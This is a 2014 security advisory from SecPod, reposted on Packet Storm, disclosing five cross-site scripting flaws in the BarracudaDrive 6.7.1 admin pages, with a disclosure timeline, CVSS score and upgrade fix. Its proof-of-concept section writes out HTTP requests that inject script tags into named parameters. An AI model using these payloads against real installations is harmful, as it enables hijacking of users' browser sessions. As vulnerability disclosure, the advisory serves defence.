Lucene search

K
packetstormShakeel BhatPACKETSTORM:126393
HistoryApr 29, 2014 - 12:00 a.m.

BarracudaDrive 6.7.1 Cross Site Scripting

2014-04-2900:00:00
Shakeel Bhat
packetstormsecurity.com
15
`###############################################################################   
#   
# Title : BarracudaDrive Multiple XSS Vulnerabilities   
# Author : Shakeel Bhat SecPod Technologies Pvt. Ltd. http://www.secpod.com   
# Vendor : http://barracudadrive.com   
# Advisory : http://secpod.org/blog/?p=2309  
# http://secpod.org/advisories/SecPod_Advistory_BarracudaDrive_6.7.1_Mult_XSS_Vuln.txt  
# Software : BarracudaDrive 6.7.1   
# Date : 20/03/2014   
#   
##############################################################################   
  
SecPod ID: 1052 20/03/2014 Issue Discovered   
25/03/2014 Vendor Notified   
26/03/2014 Vendor Responded   
27/03/2014 Vendor Solution   
28/04/2014 Advisory Released   
  
  
Class: Cross-Site Scripting Severity: Medium   
  
  
Overview:   
---------   
BarracudaDrive Multiple Reflected (1,3) and Persistent(2,4,5) Cross-site  
Scripting Vulnerabilities.   
  
  
Technical Description:   
----------------------   
  
Multiple Reflected and Persistent Cross-Site Scripting vulnerabilities are  
present in BarracudaDrive, as it fails to properly sanitize user-supplied  
input.   
  
1) Input passed via the 'role' parameter to 'protected/admin/roles.lsp' is not   
properly verified before it is returned to the user. This can be exploited to   
execute arbitrary HTML and script code in a user's browser session in the   
context of a vulnerable site.   
  
2) Input passed via the 'name' parameter to '/admin/user.lsp' is not   
properly verified before it is returned to the user. This can be exploited to   
execute arbitrary HTML and script code in a user's browser session in the   
context of a vulnerable site.   
  
3) Input passed via the 'path' parameter in   
'/rtl/protected/admin/wizard/setuser.lsp' is not properly verified before it is   
returned to the user. This can be exploited to execute arbitrary HTML and   
script code in a user's browser session in the context of a vulnerable site.   
  
4) Input passed via the 'host' parameter in '/admin/tunnelconstr.lsp' is not   
properly verified before it is returned to the user. This can be exploited to   
execute arbitrary HTML and script code in a user's browser session in the   
context of a vulnerable site.   
  
5) Input passed via the 'newpath' parameter in 'protected/admin/wfsconstr.lsp'   
is not properly verified before it is returned to the user. This can be   
exploited to execute arbitrary HTML and script code in a user's browser   
session in the context of a vulnerable site.   
  
The vulnerability has been tested in BarracudaDrive 6.7.1, Other versions may   
also be affected.   
  
  
Impact:   
--------   
Successful exploitation allows an authenticated attacker to execute arbitrary   
HTML and script code in a user's browser session in the context of a   
vulnerable site.   
  
  
Affected Software:   
------------------   
BarracudaDrive 6.7.1   
  
Tested on,   
BarracudaDrive 6.7.1 on Windows OS   
  
  
References:   
-----------   
http://secpod.org/blog/?p=2309  
http://secpod.org/advisories/SecPod_Advistory_BarracudaDrive_6.7.1_Mult_XSS_Vuln.txt  
  
  
Proof of Concept:   
  
1) localhost/rtl/protected/admin/roles.lsp?role=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E   
  
2) POST /rtl/protected/admin/user.lsp   
Host: localhost   
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8   
Accept-Language: en-US,en;q=0.5   
Accept-Encoding: gzip, deflate   
Referer: http://localhost/rtl/protected/admin/user.lsp   
Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847   
Connection: keep-alive   
Content-Type: application/x-www-form-urlencoded   
Content-Length: 80   
  
POSTDATA:   
name=<script>alert("xss1")</script>&pwd=erterter&inactive=20&maxUsers=3&recycle=true&pwdl=false&info=   
  
3) POST /rtl/protected/admin/wizard/setuser.lsp   
Host: localhost   
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0   
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8   
Accept-Language: en-US,en;q=0.5   
Accept-Encoding: gzip, deflate   
Referer: http://localhost/rtl/protected/admin/wizard/setuser.lsp   
Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847   
Connection: keep-alive   
Content-Type: application/x-www-form-urlencoded   
Content-Length: 40   
  
POSTDATA   
user=abc&password=def&path=<script>alert("xss")</script>   
  
4) POST /rtl/protected/admin/tunnelconstr.lsp  
Host: localhost   
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0   
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8   
Accept-Language: en-US,en;q=0.5   
Accept-Encoding: gzip, deflate   
Referer: http://localhost/rtl/protected/admin/tunnelconstr.lsp?   
Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847   
Connection: keep-alive   
Content-Type: application/x-www-form-urlencoded   
Content-Length: 53   
  
POSTDATA   
constr=&host=<script>alert("xss")</script>&port=22&commonports=&pathsub=Add   
  
5) POST /rtl/protected/admin/wfsconstr.lsp  
Host: localhost   
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0   
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8   
Accept-Language: en-US,en;q=0.5   
Accept-Encoding: gzip, deflate   
Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847   
Connection: keep-alive   
Content-Type: application/x-www-form-urlencoded   
Content-Length: 101   
  
POSTDATA   
basepath=&constr=qw&pathsub=abc&newpath=<script>alert("XSS")</script>&GET=on&PROPFIND=on&readaccess=on   
  
  
Solution:   
-------  
Upgrade to BarracudaDrive version 6.7.2  
  
  
Risk Factor:   
-------------   
CVSS Score Report:   
ACCESS_VECTOR = NETWORK   
ACCESS_COMPLEXITY = MEDIUM   
AUTHENTICATION = SINGLE INSTANCE   
CONFIDENTIALITY_IMPACT = NONE   
INTEGRITY_IMPACT = PARTIAL   
AVAILABILITY_IMPACT = NONE   
EXPLOITABILITY = PROOF_OF_CONCEPT   
REMEDIATION_LEVEL = UNAVAILABLE   
REPORT_CONFIDENCE = CONFIRMED   
CVSS Base Score = 3.5 (AV:N/AC:M/Au:SI/C:N/I:P/A:N)   
CVSS Temporal Score = 3.1   
Risk factor = Medium   
  
  
Credits:   
--------   
Shakeel Bhat of SecPod Technologies has been credited with the   
discovery of this vulnerability.  
`